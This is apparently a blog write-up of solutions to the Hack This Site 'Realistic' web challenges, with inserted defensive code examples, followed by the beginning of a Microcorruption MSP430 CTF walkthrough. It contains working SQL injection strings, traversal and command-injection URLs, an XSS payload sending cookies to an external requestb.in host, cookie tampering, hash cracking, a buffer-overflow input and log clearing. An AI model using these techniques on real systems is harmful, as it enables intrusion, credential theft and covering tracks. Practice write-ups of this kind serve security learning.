Hack This Site Realistic Write-Up

What follows is a write-up of a web security war game, Hack This Site – Realistic.

Players are given a set of requests they must fulfill in order to beat every challenge. Doing so entails using a variety of offensive security tools, writing code, and learning throughout the process.

Players must have a good understanding of web vulnerabilities in order to successfully complete the challenges.

[*] Status: COMPLETED
[*] Note:
I am currently updating this blog post to include screenshots.

 

Uncle Arnold’s Local Band Review

Goal:

screenshot

Solution:

Voting for “Raging Inferno”:
Open Burp Suite’s Proxy with Intercept On
Set Raging Inferno’s vote count to 5 and click on “vote!”

screenshot 2

Manipulating the votes to have “Raging Inferno” come out on top:
In the intercepted request, change the vote count to an incredibly high number.
Forward

screenshot 3

Success:

screenshot 4

Technique used: Parameter manipulation

 

Chicago American Nazi Party

Goal:

screenshot

Solution:

Checking the source code:
Right-click -> View Page Source

screenshot 2

Notice the hidden “update.php” page.

Browsing to the newly discovered page:

screenshot 3

Bypassing authentication via SQL injection:
Enter as username: ' or 1=1--
Click on “Submit Query”

screenshot 4

Success:

screenshot 5

Technique used: SQL injection

 

Peace Poetry: HACKED

Goal:

screenshot

Solution:

Checking the source code:
Right-click -> View Page Source

screenshot 2

Notice that we can browse to the original website.

Browsing to the original website “oldindex.html”:

screenshot 3

Copying the source code:
Right-click -> View Page Source -> Ctrl-A -> Ctrl-C

Fixing the website:
Click on “Submit Poetry”
Set the name of the poem to: ../index.html
Paste the original source code in the “Poem” box and click on “add poem”.

screenshot 4

Success:

screenshot 5

Technique used: Directory traversal; remote code execution

 

Fischer’s Animal Products

Goal:

screenshot

Solution:

Testing for SQL injection:

screenshot 2

Result:

screenshot 3

Testing for SQL injection via the URL:
Click on “Alligator Accessories”
In the URL bar, add a space, and add the following: UNION ALL SELECT null, *, null, null FROM email;

Full URL: https://www.hackthissite.org/missions/realistic/4/products.php?category=2 UNION ALL SELECT null, *, null, null FROM email;

Result:

screenshot 4

What UNION does is join queries, and so the results of additional (malicious) queries are joined with the results of the original query. This allows for the extraction of data within columns of other tables.
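To make the two injection mechanics on this page concrete, here is an added example (not code from the write-up or from Hack This Site) that runs both payloads, the login tautology ' or 1=1-- from the Chicago challenge and the UNION ALL ... FROM email read from this one, against a string-built query and then against a parameterised one. The schema, rows, and function names are constructed for the demo; SQLite stands in for the site's database.

```python
# Added example (not part of the write-up): string-built SQL versus a
# parameterised query, exercised with the two payloads from the page
# (the ' or 1=1-- login tautology and the UNION ALL ... FROM email read).
# The schema, rows and function names are constructed for this demo.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database with constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE products(id INTEGER, category INTEGER, name TEXT, price TEXT);
        CREATE TABLE email(address TEXT);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 2, 'Alligator belt', '49.99');
        INSERT INTO email VALUES ('alice@example.test'), ('bob@example.test');
        INSERT INTO users VALUES ('admin', 'constructed-demo-password');
        """
    )
    return con


def products_vulnerable(con: sqlite3.Connection, category: str) -> list:
    """products.php-style lookup: the category value is pasted into the SQL text."""
    sql = "SELECT id, name, price, category FROM products WHERE category=" + category
    return con.execute(sql).fetchall()


def products_safe(con: sqlite3.Connection, category: str) -> list:
    """Same lookup with a bound parameter: the value can never become SQL."""
    sql = "SELECT id, name, price, category FROM products WHERE category=?"
    return con.execute(sql, (category,)).fetchall()


def login_vulnerable(con: sqlite3.Connection, user: str, password: str):
    """update.php-style login built by concatenation; returns the matched username."""
    sql = ("SELECT username FROM users WHERE username='" + user
           + "' AND password='" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, user: str, password: str):
    """Parameterised login: quotes and comment markers in the input stay data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = con.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


# The two payloads as they appear in the write-up.
UNION_PAYLOAD = "2 UNION ALL SELECT null, *, null, null FROM email"
TAUTOLOGY = "' or 1=1--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable products:", products_vulnerable(db, UNION_PAYLOAD))  # email rows leak
    print("safe products:      ", products_safe(db, UNION_PAYLOAD))        # []
    print("vulnerable login:   ", login_vulnerable(db, TAUTOLOGY, ""))      # admin
    print("safe login:         ", login_safe(db, TAUTOLOGY, ""))            # None
```

The UNION payload only works because the injected SELECT returns the same number of columns (four) as the original query; with a bound parameter the whole string is compared against the integer column, matches nothing, and no second SELECT ever runs.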

Sending the email addresses to the client:
Copy the list of e-mails -> Go to your Hack This Site Profile -> Click on your username

screenshot 5

Success:

screenshot 6

Techniques Used: SQL injection using UNION

 

Damn Telemarketers!

Goal:

screenshot

Solution:

Check the “robots.txt” file:

screenshot 2

Browse to the “secret” directory:

screenshot 3

Click on “admin.bak.php”:

screenshot 4

Cracking the hash:
Browse to: https://crackstation.net/
Enter the hash and submit

screenshot 5

Password: 583bc

Visiting the “Database” page accessible by the main page:
Enter the password: 583bc

screenshot 6

Success:

screenshot 7

Techniques Used: Inspecting “robots.txt” file; hash cracking

 

ToxiCo Industrial Chemicals

Goal:

screenshot

Solution:

Search for “xecryption” via your favorite search engine:

screenshot 2

Proof of concept program: http://telmo.pt/xecryption/

Whether or not this is the intended solution, it is worth recognizing the value of searching for existing solutions instead of reinventing the wheel, at least in terms of efficiency. For fun’s sake, do try writing your own.

Results of decrypting the ciphertext via Telmo:

screenshot 3

Sending the decrypted message to ToxiCo_Watch:
Copy the decrypted message
Browse to: https://www.hackthissite.org/pages/messages/msys/send.php
Paste and send the message

screenshot 4

Success:

screenshot 5

Techniques Used: Use of Proof of Concept decryption script

 

What’s Right For America

Goal:

screenshot

Solution:

Checking the source code:
Right-click -> View Page Source

screenshot 2

Notice the directory structure. Browsing to images might reveal other directories.

Checking for other directories:
Browse to: https://www.hackthissite.org/missions/realistic/7/images/

screenshot 3

Bingo. Notice the admin directory.

Checking the admin directory:

screenshot 4

We are going to have to find the password somehow.

Searching for the password:
Back in the main page, click on “Patriotism”.
Notice the URL structure: showimages.php?file=patriot.txt

This may allow for directory traversal. All we have to do is access the correct path to the password file.
We will try grabbing “.htpasswd”, the file Apache uses to store credentials for HTTP authentication.

Grabbing the password:
Modify the URL: showimages.php?file=images/admin/.htpasswd
Right-click -> View Page Source

screenshot 5

screenshot 6

Cracking the password hash:
Copy and paste the password hash into a file, such as “htpasswd”
john htpasswd

screenshot 7

Username: administrator
Password: shadow

Logging into the administrator page:
Browse back to: https://www.hackthissite.org/missions/realistic/7/images/admin/

screenshot 8

Success:

screenshot 9

Techniques used: Directory traversal; hash cracking

 

United Banks Of America

Goal:

screenshot

Solution:

Searching for Gary Hunter’s username:
Click on “User Info”
Enter as user: ' or 1=1--

screenshot 2

screenshot 3

Jackpot. We have Gary’s credentials.

Register as a user:
Click on “Register”
Enter random credentials

screenshot 4

screenshot 5

Logging in as our newly created user:

screenshot 6

screenshot 7

Impersonating Gary:
Open Cookies Manager+
Search for “hackthissite” cookies
Edit the “accountUsername” cookie value and set it to: GaryWilliamHunter

screenshot 8

Transferring the money:
Set the user to send the money to as “dropCash” and the amount to: 10000000
Click on “Move Money To A Different Account”

screenshot 9

screenshot 10

Clearing the logs:
Log in again
Open Burp Suite’s Proxy with Intercept On
Click on “Clear Files In Personal Folder”
Change the “dir” parameter value to: logFiles
Forward

screenshot 11

Success:

screenshot 12

Techniques used: SQL injection; session hijacking; parameter manipulation; local file inclusion

 

CrappySoft Software

Goal:

screenshot

Solution:

Log in with the supplied credentials:

screenshot 2

Create a private RequestBin:
Browse to http://requestb.in and create a private RequestBin

screenshot 3

Perform Cross-Site Scripting (XSS) via private messages:
Click on “[Private Message]”
Send a XSS payload to the boss, m-crap (owner)

Payload:
<iframe frameborder=0 height=0 width=0 src="javascript:void(window.location='http://requestb.in/1mep2ns1?c=' + document.cookie)"></iframe>

screenshot 4

Result:

screenshot 5

The challenge assumed we wouldn’t be able to get the cookie back. However, the method shown above is valid.

Set the cookies to the admin values:
Open Cookies Manager+

screenshot 6

screenshot 7

screenshot 8

Transferring the money:
Click on “[Pay Salaries]”
Pay r-conner

screenshot 9

screenshot 10

Cleaning the logs:
Click on “[Mailing List]”
Right-click -> Inspect Element -> Change the ‘strFileName’ value to: ./files/logs/logs.txt
Click on “Subscribe!”

screenshot 11

Success:

screenshot 12

Techniques used: Cross-Site Scripting (XSS); local file inclusion

 

Holy Word High School

Goal:

screenshot

Solution:

Checking the source code:
Right-click -> View Page Source

screenshot 2

Notice the hidden “staff.php” page.

Logging in as Zach:
Click on “Student Access System”
Log in with the supplied credentials.

screenshot 3

Gaining teacher credentials:
Click on “Staff Listing”
Go back to the “staff.php” page
Log in as smiller:smiller

screenshot 5

screenshot 4

screenshot 6

We are going to have to bypass the crappy protection.

Bypassing the limitations:
Open User Agent Switcher -> Edit User Agents -> New -> New User Agent -> Add “holy_teacher” -> Ok
Open Cookies Manager+ -> Search for ‘admin’ -> Change Content to: 1
Refresh the page
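Three of the challenges so far (the accountUsername cookie at United Banks, the admin cookie values at CrappySoft, and the admin=1 cookie here) fall to the same root cause: the server trusts a plain value the browser sends back. The following is an added example, not code from the write-up or from Hack This Site, showing the flawed read beside an HMAC-signed cookie that detects any edit made in a cookie manager. The key, cookie layout, and function names are constructed for the demo.

```python
# Added example (not part of the write-up): an HMAC-signed session cookie,
# the fix for cookies like accountUsername=GaryWilliamHunter or admin=1
# that the walkthrough edits in a cookie manager. Key, cookie layout and
# function names are constructed for this demo.
import hashlib
import hmac
import secrets

# Assumed server-side secret; a real deployment loads it from configuration.
SERVER_KEY = secrets.token_bytes(32)


def read_unsigned_cookie(cookie: str) -> tuple:
    """The flawed design: trust whatever 'username|role' the browser sends back."""
    username, _, role = cookie.partition("|")
    return username, role


def issue_cookie(username: str, role: str, key: bytes = SERVER_KEY) -> str:
    """Return 'username|role.<hex tag>' with an HMAC-SHA256 tag over the payload."""
    if "|" in username or "|" in role:
        raise ValueError("the field separator is not allowed inside a field")
    payload = f"{username}|{role}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def read_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return (username, role) only if the tag verifies, else None."""
    payload, sep, tag = cookie.rpartition(".")   # the hex tag contains no '.'
    if not sep:
        return None                               # unsigned or hand-made cookie
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):    # constant-time comparison
        return None
    username, _, role = payload.partition("|")
    return username, role


def tamper(cookie: str, new_username: str, new_role: str) -> str:
    """What a cookie editor can do: rewrite the payload but keep the old tag."""
    _, _, tag = cookie.rpartition(".")
    return f"{new_username}|{new_role}.{tag}"


if __name__ == "__main__":
    c = issue_cookie("newuser", "user")
    print("issued:", c)
    print("unsigned read of edited cookie:", read_unsigned_cookie("GaryWilliamHunter|admin"))
    print("signed read of edited cookie:  ", read_cookie(tamper(c, "GaryWilliamHunter", "admin")))
```

Signing stops the edits shown in these challenges but does not hide the payload; anything secret belongs in a server-side session keyed by a random identifier rather than in the cookie itself.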

screenshot 7

screenshot 8

screenshot 9

Changing Zach’s grades:
Click on “Change Grades”
Click on “Zach Sanchez”
Right-click -> View Page Source Code
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=4&studentid=1&grade=5
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=0&studentid=1&grade=5
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=3&studentid=1&grade=5

screenshot 10

screenshot 11

The modifications were possible because the parameters are included in the URL and the HTTP POST method is used.

Success:

screenshot 12

Techniques used: User-Agent manipulation; Parameter manipulation; HTTP POST request abuse

 

BudgetServ Web Hosting

Goal:

screenshot

Solution:

Inspecting the website functionality:
Click on “WebMail”
Notice the URL structure: https://www.hackthissite.org/missions/realistic/11/page.pl?page=email

Testing for directory traversal or command injection:
In the URL: https://www.hackthissite.org/missions/realistic/11/page.pl?page=stuff

screenshot 2

We may be able to get a listing of all directories.

Listing all directories:
In the URL: https://www.hackthissite.org/missions/realistic/11/page.pl?page=|ls|

screenshot 3

Browsing to the “client_http_docs” directory:

screenshot 4

Browsing to “therightwayradio” and inspecting the source code:

screenshot 5

Manipulating user information:
Browse to: https://www.hackthissite.org/missions/realistic/11/client_http_docs/therightwayradio/?page=userinfo
Notice there’s a user whose information we can change
Change the password to: coconuts
Click on “edit account”

screenshot 6

screenshot 7

Log in as “aclu_bomber_08290”:

screenshot 8

screenshot 9

Changing SQL databases:
Click on “mod”
Right-click on the input field and select “Inspect Element”
Change the “sql_db” value from “rwr.dbase” to: ../../../bs.dbase

screenshot 10

Extract database information:
SELECT * FROM sqlite_master -> sql query

screenshot 11

Extract admin credentials:
SELECT * FROM web_hosting -> sql query

screenshot 12

Navigate to the admin page in WebServ and enter the credentials:
URL: https://www.hackthissite.org/missions/realistic/11/admin/

screenshot 13

screenshot 14

Checking the source code:
Right-click -> View Page Source

screenshot 15

Downloading the desired file:
URL: https://www.hackthissite.org/missions/realistic/11/admin/d.pl?file=/var/www/budgetserv/html/client_http_docs/space46/src.tar.gz

Success:

screenshot 16

Techniques used: Command injection; directory traversal

 

Heartland School District

Goal:

screenshot

Solution:

Learning more about Windows 95:
Search for: windows 95 server path

screenshot 2

This result leads us to believe we can specify whether we’re accessing a web page (via the http prefix) or a local file.

Mapping the drive:
In the address bar: file:\\C:\\
Go

screenshot 3

screenshot 4

Success. We can access local files via the address box.

Accessing web resources:
In the address bar: file:\\C:\\WEB\
Go

screenshot 7

Investigating HTML files:
In the address bar: file:\\C:\\WEB\HTML
Go

screenshot 5

screenshot 6

Notice the admin panel. Let us visit it and try to break in.

Exploring the admin panel:

screenshot 8

We are going to have to find the password somehow.

Finding a way to get the admin password:
Back in the main page, click on “Student Work”
Click on “Joey Simons”

screenshot 9

Notice there’s some additional functionality in this page, via “Sign my guestbook”.

Discovering another way to access files:
Click on “Sign my guestbook”.
Right-click on the input box -> Inspect Element

screenshot 10

Notice the new “guest.pl” file which has “write” permissions. If it has Write permissions, it very likely also has Read permissions. This may be a way to grab the admin’s password.

Grabbing the admin’s password:
Browse to: https://www.hackthissite.org/missions/realistic/12/cgi-bin/guest.pl?action=read&file=heartlandadminpanel.pl
Right-click -> View Page Source

screenshot 11

Score.

Username: jbardus
Password: heartlandnetworkadministrator

Logging in as JBardus:

screenshot 12

screenshot 13

Completing the mission:
Click on “clear all”

Success:

screenshot 14

Techniques used: Directory traversal; local file inclusion

 

Elbonian Republican Party

Goal:

screenshot

Solution:

Understanding the website:
Click on “Press Releases”
Right-click -> View Page Source
Click on “readpress.php”

screenshot 2

screenshot 3

From the “readpress.php” we discover many facts:
1) The machine runs MySQL
2) The service is Apache
3) The machine runs Windows
4) We can access hidden data by obtaining the hex digest of the string “Speeches”

Obtaining the hex digest of “Speeches”:
python -c 'import hashlib; print(hashlib.md5(b"Speeches").hexdigest())'

screenshot 4

Hex digest: 7e40c181f9221f9c613adf8bb8136ea8

Accessing restricted data:
Browse to: https://www.hackthissite.org/missions/realistic/13/speeches/passwords/7e40c181f9221f9c613adf8bb8136ea8/

screenshot 5

Obtaining the password:
Click on “passwords.fip”
Browse to: https://crackstation.net/
Enter the hashes, one per line

screenshot 6

User: moni1
Pass: admin

Accessing the admin panel:
Browse to: https://www.hackthissite.org/missions/realistic/13/admin/
Enter the credentials found earlier

screenshot 7

screenshot 8

Strange. However, remember how the paths were hashed. Let’s try accessing the admin page again, but with a hash instead.

Browse to: https://www.hackthissite.org/missions/realistic/13/21232f297a57a5a743894a0e4a801fc3/
Enter the cracked credentials

screenshot 9

Success:

screenshot 10

Techniques used: Source code review; directory traversal; hash/password cracking

 

Yuppers Internet Solutions

Goal:

screenshot

Solution:

Checking the source code:
Click on “News”
Right-click -> View Page Source

screenshot 2

Notice the URL structure. We may be able to manipulate the database via the URL.

Testing for SQL injection:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?news='

screenshot 3

Notice that the search works by using our query and appending “.news” to it.
We can try bypassing this concatenation by using null bytes (%00).
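The %00 trick and the ../index.html poem name from the Peace Poetry challenge are the same bug seen from two sides: a file name taken from the request reaches the filesystem before anyone checks it. Below is an added example (not code from the write-up or from Hack This Site) of the resolver such a script needs: it refuses NUL bytes, allow-lists the name, appends the fixed suffix, and then re-checks that the resolved path is still inside the story directory. The directory and names are constructed for the demo.

```python
# Added example (not part of the write-up): a story-name resolver of the
# kind news.cgi (which appends ".news") and the poetry uploader (which
# accepted ../index.html as a name) should have used. Names and the base
# directory are constructed for this demo.
import re
import tempfile
from pathlib import Path

# Allow-list: letters, digits, '-' and '_' only, so '/', '\\', '.' and NUL
# can never reach the filesystem layer.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

DEMO_DIR = tempfile.mkdtemp()   # constructed, empty story directory


def resolve_story(base_dir: str, requested: str, suffix: str = ".news") -> Path:
    """Return the on-disk path for a story name, or raise ValueError."""
    # C-style string handling stops at a NUL, which silently drops the
    # suffix; that is exactly what the %00 in the URL exploits.
    if "\x00" in requested:
        raise ValueError("NUL byte in file name")
    if not SAFE_NAME.fullmatch(requested):
        raise ValueError("file name contains disallowed characters")
    base = Path(base_dir).resolve()
    candidate = (base / (requested + suffix)).resolve()
    # Defence in depth: even after the allow-list, confirm the resolved
    # path still lies inside the story directory.
    if base not in candidate.parents:
        raise ValueError("path escapes the story directory")
    return candidate


def is_accepted(base_dir: str, requested: str) -> bool:
    """True if resolve_story would serve the name, False if it rejects it."""
    try:
        resolve_story(base_dir, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ["welcome", "moderator.cgi\x00", "../index.html", "moderator.cgi"]:
        verdict = "served as " + str(resolve_story(DEMO_DIR, name)) if is_accepted(DEMO_DIR, name) else "rejected"
        print(repr(name), "->", verdict)
```

The allow-list alone would reject every payload on this page; the final parents check is there so that a future relaxation of the pattern (say, allowing dots) cannot quietly reopen traversal.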

Further testing the SQL injection theory:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?story=.%00

screenshot 4

Success. The website is vulnerable to SQL injections.
Notice the “moderator.cgi” file, which seems particularly interesting.

Checking the “moderator.cgi” file:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?story=moderator.cgi%00

screenshot 6

If we make the program believe we are an admin by providing the “isadmin” parameter, we can bypass its security measures.

Browsing to the “moderator.cgi” file and providing “isadmin”:

screenshot 5

screenshot 7

Great success.

Getting a list of users:
View Account Info: *

screenshot 8

screenshot 9

We now have the admin credentials, webguy:reallyreallylongpasswordthatisveryveryveryhardtoguessorcrack
We can now attempt to log in as an admin.

Logging in as admin:
Browse to: https://www.hackthissite.org/missions/realistic/14/login
Enter the credentials found earlier

screenshot 10

screenshot 11

Completing the mission:
Click on “Administrator Panel”

screenshot 12

Techniques used: SQL injection using null bytes

 

seculas Ltd.

Goal:

screenshot

Solution:

Checking the source code:
Click on “News”
Right-click -> View Page Source

screenshot 2

Notice the admin information. This could be useful later.

Checking for vulnerabilities within the pages:
Click on “Jobs”
Click on “Send your application”
Click on “Send”
Right-click -> View Page Source

screenshot 3

Notice there’s a backup directory.

Browsing to the backups directory:
URL: https://www.hackthissite.org/missions/realistic/15/_backups_/

screenshot 4

Checking the “backup.zip” file:
Download the file
Open it

screenshot 5

screenshot 6

screenshot 7

Notice the files are password-protected.

Since the password cannot be found online, we can use PkCrack to crack the files.
PkCrack can help us break open the file via a “known plaintext attack”, which means we need to already hold the plaintext of part of the encrypted data in order to recover the rest.

Luckily for us, the ZIP file contains “index.htm”, which we have access to.

Using PkCrack and the “index.htm” file to break open the password-protected ZIP file:
Browse to: https://www.hackthissite.org/missions/realistic/15/index.htm
Right-click -> Save Page As -> index.htm -> Web Page, HTML only
Compress the ‘index.htm’ using Winace
pkcrack -c "misc (files from different folders)/index.htm" -p index.htm -C backup.zip -P index.zip -d decracked.zip -*
Open the “decracked.zip” file -> Internal messages -> msgauth.php

screenshot 8

screenshot 9

Take note of the variable names. These might be useful when bypassing authentication.

misc (files from different folders) -> shell.php

screenshot 10

screenshot 11

Notice the variable names and the (unlimited) directory limit.

Creating an HTML file to log in as Susy:

screenshot 12

Logging in as Susy:
Double-click on the HTML file we just created.
Click on “send”

screenshot 13

screenshot 14

Browse to: https://www.hackthissite.org/missions/realistic/15/internal_messages/internal_messages.php
Enter Susy’s credentials and click on “read messages”

screenshot 15

screenshot 16

Following the admin_area lead:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/

screenshot 17

Browse to: http://www.hackthissite.org/missions/realistic/15/admin_area/shell.php

screenshot 18

Click Ok

screenshot 19

Click “Cancel”

screenshot 20

Notice the hash.
Let’s try to crack it using CrackStation.

Cracking the hash:

screenshot 21

Password: foobar
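Four challenges on this page (Damn Telemarketers, What’s Right For America, the Elbonian passwords.fip file, and this shell.php hash) were won by pasting a hash into CrackStation or john. The reason that works is that an unsalted fast hash of a common word is a fixed value anyone can precompute. The following added example (not code from the write-up or from Hack This Site) builds such a lookup from a small constructed wordlist and contrasts it with a salted, iterated PBKDF2 store, where two users with the same password get different records and no table helps. The wordlist and function names are constructed for the demo.

```python
# Added example (not part of the write-up): why the MD5 hashes cracked on
# CrackStation and the .htpasswd hash cracked with john fall to a lookup,
# and what a salted, slow password hash does instead. The wordlist and
# function names are constructed for this demo.
import hashlib
import hmac
import os

DEMO_WORDLIST = ["123456", "password", "admin", "foobar", "shadow"]   # constructed


def md5_lookup_table(words) -> dict:
    """Unsalted MD5 is deterministic, so one table serves every site at once."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def recover_unsalted(md5_hex: str, table: dict):
    """A lookup-table 'crack': O(1) per hash, no guessing at runtime."""
    return table.get(md5_hex.lower())


def store_password(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """PBKDF2-HMAC-SHA256 with a per-user random salt, serialised as one string."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = md5_lookup_table(DEMO_WORDLIST)
    # md5("admin"); the same value appears as the hashed admin path in the Elbonian challenge.
    print(recover_unsalted("21232f297a57a5a743894a0e4a801fc3", table))   # admin
    a, b = store_password("admin"), store_password("admin")
    print(a != b, verify_password("admin", a), verify_password("guess", b))  # True True False
```

The salt defeats precomputation because the table would have to be rebuilt per record, and the iteration count makes each guess cost roughly 200,000 HMAC calls instead of one; a memory-hard function such as scrypt or Argon2 raises that cost further, which is the usual recommendation for new systems.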

Accessing the shell page:
Browse back to: http://www.hackthissite.org/missions/realistic/15/admin_area/shell.php
User Name: root
Password: foobar

screenshot 22

screenshot 23

Using the shell to list directory contents:
ls

screenshot 24

Voila. Notice the “viewpatents” files. These are what we want.

Following on the patent lead:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/viewpatents.php

screenshot 25

We get another login form. Time to look for the credentials.

Looking for the credentials to unlock patents:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/test/

screenshot 26

Excellent. Looks like we found the credentials.

Checking the “chkuserpass.c.zip” file:
Download the file and unzip it
Open the chkuserpass.c file

screenshot 27

screenshot 28

Looks like we are going to perform a good ol’ buffer overflow to bypass authentication.
Notice that all we need to have in order to bypass authentication is “is_pass_correct” set to ‘Y’.

Performing a buffer overflow on the username field:
python -c 'print("Y" * 230)'
Copy the output and paste it in the username field
Click on “OK”

screenshot 29

Success:

screenshot 30

Techniques used: Known plaintext attack; hash cracking; buffer overflow

 

Simple Mail

Goal:

screenshot

Solution:

Checking the source code:
Click on “News”
Right-click -> View Page Source

screenshot 2

Notice the URL structure, and also the admin login page.

Accessing the admin login page:
Browse to: https://www.hackthissite.org/missions/realistic/16/index.php?module=admin_login

screenshot 3

Open Burp Suite’s Proxy with Intercept On
Click on “Login”

screenshot 4

screenshot 5

Notice the requests to these two files. These might be useful in the future.
For now, we will register a new user to see what else we can do.

Register as a new user:
Browse over “Members” -> Click on “Register”

screenshot 6

Inspect member functionality:
Log in as the newly created user
Click on “User Panel” -> “Edit My Profile”
Right-click -> View Page Source
Click on “edit.php”

screenshot 7

screenshot 8

Notice how the configurations are saved.
We are in control of the username parameter, which means we may be able to perform directory traversal by choosing a special username.

Creating a malicious user:
Click on “Members” -> “Logout”
Click on “Members” -> “Register”

screenshot 9

Carrying out the attack:
Log in as the newly created user
Click on “User Panel” -> “Edit My Profile”
Personal Message: auth_page=config.txt&authed=true&

screenshot 10

 

Confirming attack was successful:
Browse to: https://www.hackthissite.org/missions/realistic/16/config.txt

screenshot 11

screenshot 12

Log in via the admin panel:
Browse to: https://www.hackthissite.org/missions/realistic/16/index.php?module=admin_login

screenshot 13

screenshot 14

Reviewing Jenn’s email:

screenshot 15

screenshot 16

Right-clicking on the input field shows that this is a Flash application.
This means we could download it and reverse engineer it.

Downloading the Flash file:
Right-click -> View Page Source

screenshot 17

Analyzing the Flash file:
flasm -d check_email.swf

screenshot 18

We simply have to navigate to that path and add Jenn’s email at the end.

Checking Jenn’s emails:
Browse to: https://www.hackthissite.org/missions/realistic/16/check_email.php?auth=true&id=63a4bf12cd&email=jenn@simplemail.com

screenshot 19

Techniques used: Local file inclusion; directory traversal; client-side control bypass via Flash reverse engineering

Microcorruption Write-Up

What follows is a write-up of an embedded security capture the flag (CTF), Microcorruption.

The CTF has security researchers try their hands against a TI MSP430 microcontroller.


Players are given a debugger and a device, and they have to find the input that unlocks the device. Every level gets progressively harder and introduces techniques such as address space layout randomization (ASLR), data execution prevention (DEP), and alphanumeric-only input limitations.

screenshot

[*] Status: COMPLETED

Level 1: New Orleans

OVERVIEW

– This is the first LockIT Pro Lock.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.01 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

There is no default password on the LockIT Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro App and entering a password when prompted, and then
restarting the LockIT Pro using the red button on the back.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

Solution:

Break main and type “continue”.

screenshot

screenshot 2

Investigate the create_password function.

screenshot 3

Notice “create_password” creates the correct password at address 0x2400.

Type ‘c’ (continue) and then press “Wait”.

screenshot 4

Notice in the live memory dump that the correct password is in address 0x2400.

Password: fVk*s!!

Type “solve” and enter the password.

screenshot 5

Level 2: Sydney

OVERVIEW

– We have revised the software in revision 02.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.02 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

There is no default password on the LockIT Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro App and entering a password when prompted, and then
restarting the LockIT Pro using the red button on the back.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 02. We have received reports that the
prior version of the lock was bypassable without knowing the
password. We have fixed this and removed the password from memory.

Solution:
Break main and type “c”.

screenshot

Investigate the check_password function.

screenshot 2

Notice “check_password” reads our input sequentially and compares it.

Taking into account that the machine deals in 16-bit little endian, the comparisons translate to:
0x3c72     = r<
0x515b     = [Q
0x582d     = -X
0x4f69     = iO

Password: r<[Q-XiO

Type “reset”, “solve”, and enter the password.

screenshot 3

Level 3: Hanoi

OVERVIEW

– This lock is attached to the LockIT Pro HSM-1.
– We have updated the lock firmware to connect with the hardware
security module.

DETAILS

The LockIT Pro b.01 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

There is no default password on the LockIT Pro HSM-1. Upon
receiving the LockIT Pro, a new password must be set by first
connecting the LockitPRO HSM to output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware Security Module 1 stores the login password,
ensuring users can not access the password through other means.
The LockIT Pro can send the LockIT Pro HSM-1 a password, and the
HSM will return if the password is correct by setting a flag in
memory.

This is Hardware Version B. It contains the Bluetooth connector
built in, and two available ports: the LockIT Pro Deadbolt should
be connected to port 1, and the LockIT Pro HSM-1 should be
connected to port 2.

Solution:
Break main and type “c”.

screenshot

Investigate the “login” function.

screenshot 2

Notice at address 0x455a that there is a comparison instruction: cmp.b    #0x40, &0x2410

0x40 = @

Type ‘c’, input: aaaabbbb, and send.

screenshot 3

Notice in the live memory dump that our input starts at address 0x2400.

We can now calculate the offset to bypass the password authentication:
0x2410 - 0x2400 = 0x10 = 16 bytes

